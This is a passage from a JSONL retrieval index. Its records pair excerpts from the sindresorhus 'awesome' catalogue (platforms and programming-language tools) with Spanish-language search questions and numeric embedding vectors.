0.0695, -0.04531, 0.00363, -0.00619, 0.00884, 0.05491, 0.00534, 0.01365, 0.07927, -0.0482, 0.15255, -0.04194, -0.13695, 0.02063, 0.08217, -0.07657, -0.08853, -0.16323, 0.0028, -0.11847, -0.03659, -0.11094, 0.08668, 0.0127, 0.00828, -0.08472, 0.02003, 0.02403, -0.0768, 0.00941, -0.01061, -0.08829, -0.03562, 0.10608, 0.07804, 0.00084, 0.04009, 0.01382, -0.02544, -0.09319, 0.01161, 0.09825, 0.01429, 0.05166, -0.05512, 0.02664, -0.06725, 0.0273, 0.05198, -0.04025, 0.00021, 0.04716, 0.1232, -0.08307, 0.0454, -0.01554, 0.11314, 0.09612, -0.03172, -0.01845, 0.03651, -0.13055, -0.02629, -0.01889, 0.00428, 0.01381, 0.02695, -0.08284, -0.07837, -0.05014, -0.0384, 0.04417, 0.05786, -0.08452, 0.1139, -0.08334, -0.01009, -0.00314, -0.00291, 0.09282, -0.06544, 0.01241, 0.01044, -0.03963, -0.00968, -0.00571, -0.01355, -0.00954, -0.05671, 0.05611, -0.00145, -0.06436, -0.04081, -0.02291, -0.03672, 0.03415, 0.04559, 0.07442, -0.03839, 0.01821, -0.00328, 0.15721, -0.03584, -0.05329, 0.01419, -0.04003, 0.02202, -0.02556, 0.00239, -0.02635, -0.06531, 0.02232, -0.03085, 0.0064, 0.03992, 0.03541, 0.06159, -0.01305, 0.0104, 0.06217, -0.1086, -0.0447, -0.04997, -0.00326, 0.02863, -0.03834, -0.02434, 0.01303, -0.00141, 0.00376, -0.07575, -0.02276, 0.06091, 0.00207, 0.00103, 0.10066, 0.03947, -0.05539, 0.00588, -0.01364, -0.01905, 0.00782, 0.03985, 0.02652, 0.02145, 0.06365, -0.05279, -0.07402, 0.02547, 0.00159, 0.06683, -0.05211, -0.03065, 0.00351, -0.02359, 0.02881, 0.10142, 0.00894, 0.01235, 0.00053, -0.02495, -0.06815, 0.03357, 0.00408, 0.0094, -0.04627, 0.0209, -0.016, -0.02537, -0.03206, -0.07379, 0.04477, -0.03237, -0.02607, -0.0615, -0.02185, -0.06495, -0.01089, -0.00953, -0.0451, -0.02405, -0.00098, 0.02257, 0.01478, -0.05589, 0.04847]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Home Assistant β€” Open source home automation that puts local control and privacy first. IBM Cloud β€” Cloud platform for developers and companies. Firebase β€” App development platform built on Google Cloud. Adafruit IO β€” Visualize and store data from any device. Cloudflare β€” CDN, DNS, DDoS protection, and security for your site. Actions on Google β€” Developer platform for Google Assistant. ESP β€” Low-cost microcontrollers with WiFi and broad IoT applications. Deno β€” A secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust. DOS β€” Operating system for x86-based personal computers that was popular during the 1980s and early 1990s. Nix β€” Package manager for Linux and other Unix systems that makes package management reliable and reproducible. Integration β€” Linking together different IT systems (components) to functionally cooperate as a whole. Node-RED β€” A programming tool for wiring together hardware devices, APIs, and online services.", "indexar": "cuΓ‘l de estas opciones me sirve para gestionar paquetes en sistemas Linux y otros Unix?", "v": [-0.00058, 0.0521, -0.15903, -0.11902, -0.01506, -0.21042, -0.11615, -0.01916, -0.10467, -0.05863, -0.01958, -0.13124, 0.0347, -0.02238, 0.02, -0.03399, -0.03019, -0.12633, 0.00208, -0.04908, -0.047, 0.07119, -0.1316, -0.03137, 0.03198, 0.0531, 0.15332, -0.18643, -0.03632, 0.05214, -0.05053, 0.04048, 0.01122, -0.08886, -0.05155, 0.07382, -0.04844, 0.0607, 0.12286, 0.03678, 0.07048, -0.04387, -0.02015, 0.0554, 0.04894, -0.09479, 0.04052, -0.02129, 0.09613, -0.1915, 0.01436, -0.05806, -0.11965, -0.00077, 0.04111, -0.01796, 0.1196, -0.14479, 0.11018, -0.00954, -0.10545, 0.02059, 0.0447, -0.04385, 0.09641, -0.00162, -0.10405, -0.05519, -0.09586, 0.0093, 0.01685, 0.07878, 0.0056, -0.00794, -0.00227, 0.06188, -0.0445, 0.09249, 0.0309, 0.05523, 0.07228, 0.01062, -0.0575, 0.06866, -0.02372, -0.17245, 0.00343, 0.01575, -0.03736, -0.01429, 0.0507, -0.06205, -0.025, 0.01143, 0.10837, 0.02334, 0.02152, 0.03607, -0.02762, -0.00816, 0.03863, 0.02295, -0.19487, 0.07612, -0.07143, 0.02028, 0.10262, -0.06023, 0.02218, -0.10466, 0.00282, -0.01702, 0.02531, -0.02682, -0.1034, -0.03104, 0.02238, 0.03858, -0.05391, 0.04029, -0.07095, 0.0111, 0.00123, 0.00355, 0.09524, -0.03368, 0.06282, 0.13651, 0.00204, -0.00595, -0.04455, -0.07811, 0.00594, 0.04938, -0.03427, -0.0338, 0.03595, -0.07566, -0.02167, -0.01437, -0.00982, 0.1345, -0.00066, 0.0224, 0.12579, 0.02284, 0.03588, -0.05664, 0.05222, -0.05683, -0.02212, -0.04976, 0.02634, -0.02774, -0.05207, -0.02353, 0.03119, -0.05447, -0.08458, -0.04073, -0.03615, -0.00137, -0.01504, 0.09061, -0.05041, -0.00269, -0.05016, 0.02976, 0.04418, 0.0707, 0.01926, 0.07276, 0.02518, -0.01598, 0.03523, -0.13467, -0.03696, -0.13249, 0.0162, 0.0362, -0.02561, 0.03106, 0.00467, 0.03068, 0.02176, 0.0171, -0.06642, 0.07665, -0.00203, 0.05149, 0.05815, 0.04928, -0.03653, -0.06542, -0.00306, 0.0203, -0.0118, -0.04201, -0.04459, 0.04242, -0.07219, 0.04377, 0.01147, -0.02262, 0.04492, 0.07299, -0.04896, 0.02656, 0.02686, 0.01661, 0.01778, 0.04645, 0.065, -0.01439, -0.03822, -0.01236, 0.04875, 0.03843, 0.02413, -0.01603, -0.04465, -0.04149, 0.04214, -0.04161, -0.03547, -0.01536, 0.00113, 0.01936, -0.02044, -0.01734, 0.04422, -0.02653, 0.01596, 0.07114, -0.00619, -0.02378, 0.03976, -0.00813, -0.00348, -0.04191, 0.00361, 0.10881, -0.00836, -0.07061, -0.07223, -0.07952, -0.12362, 0.03517, -0.04349, -0.04095, -0.05786, 0.0288, -0.0228, 0.00686, -0.01562, -0.02992]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Home Assistant β€” Open source home automation that puts local control and privacy first. IBM Cloud β€” Cloud platform for developers and companies. Firebase β€” App development platform built on Google Cloud. Adafruit IO β€” Visualize and store data from any device. Cloudflare β€” CDN, DNS, DDoS protection, and security for your site. Actions on Google β€” Developer platform for Google Assistant. ESP β€” Low-cost microcontrollers with WiFi and broad IoT applications. Deno β€” A secure runtime for JavaScript and TypeScript that uses V8 and is built in Rust. DOS β€” Operating system for x86-based personal computers that was popular during the 1980s and early 1990s. Nix β€” Package manager for Linux and other Unix systems that makes package management reliable and reproducible. Integration β€” Linking together different IT systems (components) to functionally cooperate as a whole. Node-RED β€” A programming tool for wiring together hardware devices, APIs, and online services.", "indexar": "con quΓ© herramienta puedo conectar diferentes dispositivos de hardware y servicios en lΓ­nea sin programar mucho?", "v": [0.06218, 0.16019, -0.22828, -0.20758, 0.03157, -0.11806, -0.04451, -0.00361, -0.08119, -0.08432, -0.12138, -0.05241, -0.04144, -0.10062, 0.06173, 0.04349, 0.06445, -0.14787, 0.01247, -0.01588, -0.03241, 0.04463, -0.12505, -0.0519, -0.07242, 0.02268, 0.11624, -0.00563, -0.22893, 0.03004, -0.00548, -0.00407, 0.11829, -0.05516, -0.12828, -0.09548, -0.02257, 0.15246, 0.0538, 0.0535, -0.04182, 0.03985, -0.01263, 0.01898, 0.10379, -0.02116, 0.05503, -0.02242, 0.03162, 0.05006, -0.13736, -0.03953, -0.09521, 0.01668, -0.03315, -0.12413, 0.17172, -0.13174, 0.08901, -0.12907, -0.06379, 0.01611, -0.05803, -0.03309, 0.04241, 0.04045, -0.04505, -0.0436, -0.09605, 0.03585, 0.00014, 0.04061, -0.02223, -0.02407, 0.05295, 0.10509, -0.0046, -0.01121, 0.08395, 0.05921, 0.03247, 0.01942, -0.01353, -0.02349, -0.0586, -0.03079, 0.0514, 0.0202, 0.01887, -0.07503, 0.08019, 0.0819, -0.04004, -0.01112, -0.00772, 0.02181, 0.08113, 0.00365, 0.04654, -0.00365, 0.15323, -0.00684, -0.10487, 0.12898, -0.08602, 0.01094, 0.04009, -0.04212, -0.01253, -0.0233, 0.00421, -0.03554, -0.01863, -0.04821, -0.07566, -0.02746, -0.00122, -0.10561, -0.00332, -0.0089, -0.01054, 0.04141, 0.06831, -0.03239, 0.08187, 0.04435, -0.07419, 0.09816, 0.02189, -0.03479, 0.07746, -0.05713, -0.01494, -0.04155, -0.0405, 0.02091, 0.00242, -0.1067, 0.02808, -0.07854, 0.07726, 0.0649, -0.02995, -0.04448, 0.03551, 0.00107, 0.01245, -0.04936, -0.07871, 0.0137, 0.03144, 0.03334, -0.05929, 0.07491, -0.09519, 0.03422, -0.00307, -0.00353, -0.07145, 0.04476, -0.08698, -0.02145, 0.03668, -0.00355, -0.02682, -0.02502, -0.04772, 0.02178, 0.10683, 0.0514, -0.03735, 0.09817, 0.05792, -0.02138, 0.00164, -0.04725, -0.03759, 0.001, 0.03473, -0.07495, -0.10775, 0.04099, -0.01578, -0.06088, -0.0113, 0.0148, -0.03869, -0.04875, 0.01159, 0.02564, 0.01441, 0.03861, -0.01627, 0.00707, 0.03506, -0.06229, -0.0452, -0.03818, 0.00916, -0.00197, -0.06927, 0.03309, 0.00332, -0.02975, 0.05037, 0.08372, -0.02847, -0.00345, -0.00668, 0.07968, 0.05191, -0.06666, 0.05983, -0.03475, -0.04201, -0.01759, 0.00253, 0.00274, 0.00565, 0.05095, 0.04461, -0.00557, 0.01574, 0.00834, -0.02181, 0.0112, -0.0018, 0.04348, -0.0023, -0.01949, -0.00966, -0.0395, -0.02487, -0.03295, 0.00662, 0.0136, 0.02288, -0.06387, -0.0579, -0.01601, -0.01362, 0.07924, 0.017, -0.04361, -0.02229, -0.05863, -0.05714, -0.02314, -0.0497, -0.08981, -0.02092, 0.04801, 0.08826, -0.04384, 0.00144, 0.01146]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Low Code β€” Allowing business professionals to address their needs on their own with little to no coding skills. Capacitor β€” Cross-platform open source runtime for building Web Native apps. ArcGIS Developer β€” Mapping and location analysis platform for developers. Bluetooth Low Energy β€” Low-power wireless communication protocol ideal for IoT, wearables, and other battery-powered applications. Uno Platform β€” Open-source .NET UI platform for building cross-platform apps. Google Cloud β€” Cloud computing services by Google. Firebase Genkit β€” An open-source framework for building AI-powered apps and features. Backstage β€” Open-source platform for building Internal Developer Portals that unify tools and workflows.", "indexar": "que programa puedo usar para crear aplicaciones sin necesidad de saber programar", "v": [0.02719, 0.09399, -0.16327, -0.24129, 0.05181, -0.09483, 0.01458, -0.04274, -0.12315, -0.05038, -0.06923, -0.06105, -0.04304, -0.11648, -0.0798, 0.02471, 0.02435, -0.10554, 0.03684, 0.08348, 0.02874, 0.06321, -0.11375, -0.04946, -0.08147, 0.08813, 0.04477, -0.06731, -0.05687, 0.01108, -0.05451, 0.06217, 0.12238, -0.14579, -0.0601, -0.05224, 0.00429, -0.07275, -0.04403, 0.07905, 0.02438, 0.08187, -0.018, 0.09069, 0.02006, 0.08277, 0.11044, -0.0395, -0.03842, -0.00499, -0.00868, 0.01016, -0.06073, 0.02924, 0.08976, -0.10744, 0.03979, -0.18065, -0.05322, -0.02364, -0.03549, 0.05618, 0.00901, -0.00223, 0.03482, -0.03476, 0.0898, 0.06276, -0.11889, 0.05863, -0.07688, 0.05705, -0.03356, 0.00668, 0.08258, 0.04716, -0.03187, -0.09329, 0.04006, -0.01781, -0.0782, 0.00881, 0.01573, 0.00034, -0.05831, -0.05549, 0.10559, 0.01849, 0.02916, -0.06403, -0.01697, 0.06459, -0.02158, 0.0239, 0.13858, -0.0461, 0.13252, 0.06083, 0.0733, 0.142, 0.0233, -0.1377, -0.05678, 0.05732, -0.08932, 0.04656, 0.13132, -0.09653, -0.00781, 0.02143, 0.00396, -0.0781, -0.0317, -0.03645, -0.08147, 0.02416, 0.01052, -0.07231, 0.02692, -0.05973, -0.06503, 0.03201, -0.0255, -0.03653, 0.09645, -0.00138, -0.00799, 0.15065, -0.09516, 0.0652, 0.01566, -0.05802, -0.07549, -0.03494, -0.08984, 0.0082, 0.02065, -0.02202, 0.01942, -0.02889, -0.00937, 0.06914, -0.03626, 0.02214, 0.03601, 0.0524, -0.02153, -0.0511, -0.00535, 0.01347, 0.06869, -0.00977, -0.03725, 0.0596, -0.11867, -0.03628, 0.02247, -0.05935, -0.03338, 0.02224, -0.10977, 0.0247, -0.0873, -0.07515, 0.0375, -0.1191, 0.02171, 0.02451, 0.09051, 0.13562, 0.01116, 0.09132, 0.07319, -0.07644, 0.03912, -0.02325, 0.00903, -0.04952, -0.03739, -0.06354, -0.08408, 0.00814, 0.03122, -0.00362, -0.01973, -0.04552, -0.01312, 0.04447, -0.00133, 0.02095, -0.03239, 0.07642, 0.02122, -0.01697, 0.00506, -0.02157, 0.03918, -0.03606, 0.01618, -0.05253, -0.03877, 0.0141, -0.04069, -0.02051, 0.07307, 0.07661, -0.04543, 0.0595, 0.04628, 0.10007, 0.02378, -0.05483, 0.02276, 0.04156, -0.01342, -0.06509, 0.00718, 0.07161, 0.05919, 0.03946, 0.0114, -0.0252, -0.00369, 0.02884, 0.00997, -0.04141, 0.01106, 0.04235, 0.00045, 0.02753, -0.01927, -0.03274, -0.01169, -0.0488, -0.00279, 0.00117, -0.01644, -0.04924, -0.02818, -0.06597, -0.03935, 0.09628, 0.0018, -0.04376, -0.03528, -0.0219, -0.07002, 0.01235, -0.04231, -0.03577, -0.03118, 0.07747, 0.07955, -0.03024, 0.03631, 0.05426]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Low Code β€” Allowing business professionals to address their needs on their own with little to no coding skills. Capacitor β€” Cross-platform open source runtime for building Web Native apps. ArcGIS Developer β€” Mapping and location analysis platform for developers. Bluetooth Low Energy β€” Low-power wireless communication protocol ideal for IoT, wearables, and other battery-powered applications. Uno Platform β€” Open-source .NET UI platform for building cross-platform apps. Google Cloud β€” Cloud computing services by Google. Firebase Genkit β€” An open-source framework for building AI-powered apps and features. Backstage β€” Open-source platform for building Internal Developer Portals that unify tools and workflows.", "indexar": "con que herramienta construyo aplicaciones mΓ³viles que funcionen tanto en Android como en iOS", "v": [-0.06348, 0.04664, -0.07114, -0.15593, 0.08057, -0.03513, -0.1351, 0.08498, -0.07111, 0.02137, -0.09058, -0.05113, -0.01721, -0.02795, 0.0518, -0.05217, 0.02192, -0.12884, -0.0579, 0.03584, -0.09304, 0.05111, -0.16208, -0.03161, -0.12176, 0.13156, -0.04226, -0.01424, -0.14779, -0.04272, 0.0119, -0.08125, 0.17419, -0.05218, -0.18667, -0.15773, -0.06842, 0.0312, -0.12395, -0.01551, -0.02085, -0.0097, -0.05863, 0.03027, -0.02224, 0.02147, 0.04604, -0.02781, -0.13131, 0.02188, -0.05274, -0.12978, -0.01668, 0.05892, -0.0182, -0.05793, 0.16428, -0.14753, 0.06736, -0.04478, -0.13114, 0.07927, -0.03881, 0.00677, 0.08351, -0.02509, 0.06865, 0.0965, -0.04057, -0.03062, 0.09526, 0.07414, -0.05902, 0.11128, 0.09073, 0.11777, -0.069, -0.00211, -0.05251, 0.04319, 0.00111, -0.05173, -0.08221, -0.00125, -0.00385, -0.04414, 0.04465, 0.04391, -0.01507, -0.0699, -0.02911, -0.00489, -0.05588, 0.01459, -0.04294, -0.01407, 0.1026, 0.01275, 0.12297, 0.09458, 0.07017, -0.07766, -0.03604, -0.02691, -0.09733, -0.01383, 0.04035, -0.00614, 0.00311, -0.01785, 0.00367, -0.05774, 0.04467, 0.05242, -0.03386, 0.03433, -0.0475, -0.10974, -0.06893, -0.07191, -0.00661, -0.00084, -0.01754, -0.03638, 0.03576, 0.01933, -0.04215, 0.10221, 0.05469, -0.02803, 0.03558, -0.08929, -0.01494, 0.10797, -0.04843, 0.01142, 0.0514, -0.00147, 0.0334, -0.01987, 0.03551, 0.05699, -0.01106, -0.0639, 0.02571, 0.03706, -0.03659, 0.01337, 0.05528, -0.00254, 0.03421, 0.00264, -0.05504, 0.04699, -0.09962, -0.00169, -0.02508, -0.08002, -0.02602, 0.06401, -0.06771, -0.07817, -0.01644, -0.02133, -0.07122, -0.07773, -0.0162, 0.03538, 0.15031, -0.00612, 0.0317, 0.0428, 0.11706, -0.03055, -0.0336, -0.05665, 0.05173, 0.04481, 0.02439, -0.08732, -0.03333, -0.01097, 0.00188, -0.05614, 0.02802, -0.07595, -0.04424, -0.0245, 0.01413, 0.05232, -0.005, 0.09282, 0.05233, 0.03208, 0.01908, -0.02136, -0.01221, -0.03982, 0.02689, 0.01001, -0.05204, -0.04669, -0.0049, -0.01376, 0.07779, 0.03502, 0.01828, 0.06848, 0.00314, 0.0381, 0.04201, 0.02002, 0.06287, 0.0965, 0.02928, -0.0672, 0.03209, 0.08504, -0.0491, -0.01218, 0.00625, -0.02009, 0.01913, 0.00952, -0.01471, 0.06887, 0.01827, -0.03302, -0.00379, 0.00548, 0.03548, -0.04457, 0.01455, -0.02242, 0.04903, 0.03087, 0.06483, -0.00445, -0.04793, -0.0648, -0.02985, 0.0469, 0.06431, -0.01523, -0.08257, -0.06084, -0.03355, 0.01193, -0.01691, -0.10507, -0.00037, 0.06858, 0.11127, -0.02179, 0.02662, -0.00412]} -{"tipo": "pregunta", "herramienta": "Platforms", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Platforms", "tema": "platforms", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Platforms: Low Code β€” Allowing business professionals to address their needs on their own with little to no coding skills. Capacitor β€” Cross-platform open source runtime for building Web Native apps. ArcGIS Developer β€” Mapping and location analysis platform for developers. Bluetooth Low Energy β€” Low-power wireless communication protocol ideal for IoT, wearables, and other battery-powered applications. Uno Platform β€” Open-source .NET UI platform for building cross-platform apps. Google Cloud β€” Cloud computing services by Google. Firebase Genkit β€” An open-source framework for building AI-powered apps and features. Backstage β€” Open-source platform for building Internal Developer Portals that unify tools and workflows.", "indexar": "cual es una alternativa libre a las herramientas de Google Cloud para desarrollar software", "v": [-0.05752, -0.01868, -0.03929, -0.14825, -0.12697, -0.15873, -0.03571, 0.02244, -0.10895, -0.06096, -0.16146, -0.16537, -0.12537, -0.03099, 0.03398, -0.02295, 0.0509, -0.2137, 0.01689, 0.04446, -0.07238, 0.01598, -0.15341, -0.16792, -0.10058, -0.07627, -0.00516, -0.02389, -0.07376, 0.05563, 0.01409, -0.05262, -0.00478, -0.04345, -0.12872, -0.02144, 0.05562, 0.06262, 0.00032, -0.06394, -0.05878, -0.03303, -0.09767, 0.10876, -0.01939, -0.07334, 0.02627, 0.01871, 0.00233, 0.05595, -0.08827, -0.05409, -0.09, -0.03399, 0.14096, -0.01496, 0.12905, -0.12809, -0.06187, -0.09878, -0.15016, 0.06843, -0.0094, 0.02317, -0.02073, 0.04732, -0.00511, 0.03727, -0.19148, 0.13393, 0.06365, -0.00608, 0.01791, -0.07895, 0.02434, 0.0249, -0.02181, 0.02525, -0.05988, 0.04443, 0.06701, 0.01561, -0.0362, 0.06283, -0.11721, -0.14527, 0.06878, -0.06957, 0.02377, -0.0121, -0.00115, 0.08278, -0.06452, 0.13787, 0.06297, 0.01397, 0.14799, -0.01387, -0.03244, 0.0174, 0.0967, -0.00044, -0.05026, 0.01469, -0.0794, -0.01607, 0.02026, 0.00379, -0.10361, -0.00644, -0.01266, 0.07008, 0.05492, 0.06745, 0.03639, -0.04512, 0.0206, -0.06424, 0.02079, -0.02218, 0.01887, -0.02968, -0.11361, -0.08626, 0.01462, 0.07313, -0.02166, 0.05595, -0.0323, -0.05439, -0.00986, -0.06335, -0.02989, 0.00372, -0.00723, 0.05642, 0.08802, -0.09052, 0.0344, -0.02551, 0.02275, -0.02663, -0.00112, -0.03719, 0.08565, -0.07112, -0.0087, -0.0261, -0.02395, -0.11196, -0.06926, 0.0008, -0.01341, 0.11689, -0.10243, 0.03742, -0.08792, 0.02235, -0.1036, 0.00994, -0.04413, -0.04469, -0.02944, -0.00053, 0.02263, -0.02603, 0.08132, 0.04841, -0.03847, 0.07564, -0.00859, 0.06918, 0.07523, -0.08338, 0.03395, -0.03316, 0.02323, -0.06947, -0.01485, -0.05745, -0.04359, 0.00382, 0.00279, 0.00927, -0.02232, -0.08286, -0.03298, 0.00013, 0.01043, 0.05659, -0.05285, 0.00742, -0.00398, -0.07818, 0.05147, -0.01516, -0.06214, -0.06575, -0.02816, -0.02147, -0.0823, -5e-05, -0.0234, -0.0508, -0.05011, 0.00349, 0.03955, 0.03469, -0.00908, 0.04591, 0.01153, -0.01763, 0.04182, 0.01706, 0.00979, -0.00591, 0.00502, 0.03924, 0.03672, -0.05087, 0.01566, -0.01877, 0.02605, 0.01479, -0.03138, 0.03551, 0.01436, 0.06194, -0.00632, -0.03009, 0.021, -0.01236, 0.00953, 0.01005, 0.00869, -0.00186, 0.03218, 0.01235, -0.01968, 0.00235, 0.01418, 0.0426, -0.01462, -0.00159, -0.05754, -0.00171, -0.07694, -0.06158, -0.01636, -0.02274, -0.05811, 0.02679, 0.05025, -0.00906, -0.01812, 0.00383]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: JavaScript. Promises. Standard Style β€” Style guide and linter. Must Watch Talks. Tips. Network Layer. Micro npm Packages. Mad Science npm Packages β€” Impossible sounding projects that exist. Maintenance Modules β€” For npm packages. npm β€” Package manager. AVA β€” Test runner. ESLint β€” Linter. Functional Programming. Observables. npm scripts β€” Task runner. 30 Seconds of Code β€” Code snippets you can understand in 30 seconds. Ponyfills β€” Like polyfills but without overriding native APIs. Swift β€” Apple's compiled programming language that is secure, modern, programmer-friendly, and fast. Education. Playgrounds. Python β€” General-purpose programming language designed for readability. Asyncio β€” Asynchronous I/O in Python 3. Scientific Audio β€” Scientific research in audio/music. CircuitPython β€” A version of Python for microcontrollers. Data Science β€” Data analysis and machine learning. Typing β€” Optional static typing for Python. MicroPython β€” A lean and efficient implementation of Python 3 for microcontrollers. Rust.", "indexar": "que programa es mejor para escribir cΓ³digo JavaScript con linters?", "v": [-0.02749, -0.02552, -0.05302, -0.14277, -0.00678, -0.262, -0.10819, 0.06015, 0.01934, -0.10635, 0.04154, -0.14336, 0.06017, -0.15514, 0.07042, -0.03701, 0.09749, -0.05862, 0.09117, -0.02041, -0.06491, 0.01245, -0.08743, -0.15234, -0.0364, -0.02694, -0.01599, 0.07979, -0.01946, 0.13189, -0.05561, -0.00407, 0.03687, 0.01525, -0.00952, 0.11582, 0.17852, 0.12049, 0.00982, 0.16843, 0.06556, 0.13655, -0.00446, 0.06761, -0.07592, -0.03771, 0.10536, 0.07222, 0.0196, -0.08387, 0.0088, 0.02723, 0.02715, 0.07597, 0.00767, 0.09554, -0.02954, -0.14014, -0.14278, 0.02019, 0.10294, -0.07856, -0.07782, -0.14857, 0.00427, -0.03515, 0.09592, -0.008, 0.00225, 0.02572, 0.004, 0.00943, -0.10449, -0.0397, 0.05353, 0.03777, -0.08261, -0.07241, 0.05621, 0.11471, -0.0479, -0.0049, 0.03047, 0.05381, 0.02865, 0.05985, -0.05894, -0.05796, -0.01349, -0.00923, 0.09493, -0.03172, -0.00127, 0.01123, 0.07554, -0.02082, 0.08554, 0.01425, 0.11833, 0.01316, 0.01057, -0.09142, -0.0013, 0.00943, 0.10074, 0.07401, 0.08348, 0.03808, 0.01824, 0.07211, -0.00946, -0.05004, -0.0757, 0.00688, -0.04987, -0.05375, -0.01601, -0.05094, 0.05436, -0.12129, -0.08428, 0.07047, -0.10907, -0.02327, 0.09338, 0.11695, -0.0069, 0.07564, -0.02428, 0.01284, -0.07361, 0.00394, -0.02769, 0.04009, 0.00899, 0.08612, 0.11622, 0.04365, 0.0131, 0.05476, -0.0484, -0.0258, 0.03391, 0.09725, -0.0387, 0.03494, -0.02722, -0.02822, -0.05824, 0.01493, -0.02756, 0.05075, 0.0162, 0.01906, -0.07846, -0.05228, -0.00474, 0.02865, -0.06288, 0.00386, -0.08659, 0.00888, -0.02463, -0.02705, 0.05866, 0.00687, 0.02117, 0.01672, 0.00466, 0.03561, 0.0143, 0.01283, 0.123, -0.05808, -0.00128, -0.0206, -0.00144, -0.0342, -0.04113, 0.01264, -0.02275, 0.01828, 0.07136, 0.00014, 0.04204, 0.00261, 0.04358, 0.08042, 0.01028, -0.07808, -0.03494, -0.01021, 0.03763, -0.01547, -0.03552, 0.03035, -0.02419, 9e-05, 0.02725, -0.06781, -0.00463, 0.07006, 0.02018, -0.00558, -0.01255, 0.03212, -0.03117, -0.05529, 0.0061, 0.02793, 0.01679, -0.04187, -0.04748, 0.06504, -0.0367, 0.00576, -0.04767, 0.0937, 0.08945, 0.00557, 0.00578, -0.02828, -0.00966, 0.0066, 0.01621, -0.10082, -0.01575, 0.05727, 0.00966, 0.02689, -0.03083, -0.08722, 0.00075, 0.03062, -0.02579, 0.02094, -0.04805, -0.01511, -0.01099, -0.03113, -0.03861, 0.01004, -0.00946, -0.06329, -0.01147, 0.05111, -0.05235, -0.04748, -0.01737, 0.03561, -0.02414, -0.07225, 6e-05, -0.05302, 0.04184, 0.09519]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: JavaScript. Promises. Standard Style β€” Style guide and linter. Must Watch Talks. Tips. Network Layer. Micro npm Packages. Mad Science npm Packages β€” Impossible sounding projects that exist. Maintenance Modules β€” For npm packages. npm β€” Package manager. AVA β€” Test runner. ESLint β€” Linter. Functional Programming. Observables. npm scripts β€” Task runner. 30 Seconds of Code β€” Code snippets you can understand in 30 seconds. Ponyfills β€” Like polyfills but without overriding native APIs. Swift β€” Apple's compiled programming language that is secure, modern, programmer-friendly, and fast. Education. Playgrounds. Python β€” General-purpose programming language designed for readability. Asyncio β€” Asynchronous I/O in Python 3. Scientific Audio β€” Scientific research in audio/music. CircuitPython β€” A version of Python for microcontrollers. Data Science β€” Data analysis and machine learning. Typing β€” Optional static typing for Python. MicroPython β€” A lean and efficient implementation of Python 3 for microcontrollers. Rust.", "indexar": "cual es una alternativa libre a los polyfills tradicionales para programaciΓ³n?", "v": [0.06204, 0.03704, -0.16443, -0.01109, -0.05977, -0.033, 0.19122, -0.09752, -0.13943, -0.07532, -0.00185, -0.00204, 0.00933, -0.00633, -0.03458, -0.07697, 0.0082, -0.12233, 0.1544, 0.01461, -0.16184, 0.00681, -0.21268, -0.12532, 0.01211, -0.03154, 0.06244, -0.00223, -0.13566, 0.00093, 0.05333, 0.07893, 0.06805, -0.11654, -0.05014, 0.0262, 0.10378, 0.12483, -0.07758, -0.11663, -0.00813, -0.09425, -0.08427, 0.06115, -0.05559, -0.01069, -0.02246, 0.06845, -0.03103, 0.0078, -0.08536, 0.0498, -0.01008, 0.03456, 0.15891, -0.1388, 0.00945, -0.11592, -0.07827, -0.03728, 0.0035, 0.07925, 0.04183, -0.06013, 0.09124, 0.03211, -0.00102, 0.02414, -0.05238, 0.06941, 0.06371, -0.00256, -0.04721, -0.01135, -0.08155, 0.07634, -0.08189, -0.03397, -0.01107, 0.0281, -0.0255, -0.12973, 0.03094, 0.05967, -0.00182, -0.05371, 0.07038, -0.10534, -0.0508, -0.00341, 0.08318, 0.03352, -0.05944, 0.1062, 0.07862, -0.08584, 0.05095, 0.0866, 0.00474, 0.10685, 0.06044, -0.04663, -0.09154, -0.03482, 0.0293, -0.02613, 0.02592, -0.01278, 0.00704, 0.03067, 0.04189, 0.04736, -0.04961, 0.03022, -0.03872, -0.01866, -0.00233, 0.04105, -0.01089, -0.00195, -0.07746, 0.05971, -0.0319, -0.01634, 0.06357, 0.01984, 0.00636, 0.09609, -0.05265, 0.07078, 0.01411, -0.02281, -0.07277, -0.05384, -0.09733, -0.07202, 0.09291, -0.0454, 0.05764, 0.01363, 0.0479, 0.04631, 0.00284, 0.03694, 0.01201, 0.02623, 0.00181, -0.02186, -0.04565, 0.00783, -0.08763, 0.09062, -0.0071, 0.13587, -0.07624, 0.02898, -0.07545, -0.0312, -0.05176, 0.1101, 0.01629, -0.06495, 0.01227, -0.06578, -0.04618, -0.02785, -0.04121, -0.0882, -0.02954, 0.04505, -0.00994, 0.08378, 0.03938, -0.10384, -0.00561, -0.05353, -0.0261, -0.08542, 0.0541, -0.05943, -0.05817, 0.02277, -0.1176, 0.00325, 0.04401, -0.05881, -0.03287, 0.00468, 0.04849, 0.01019, -0.02244, 0.03329, -0.06446, 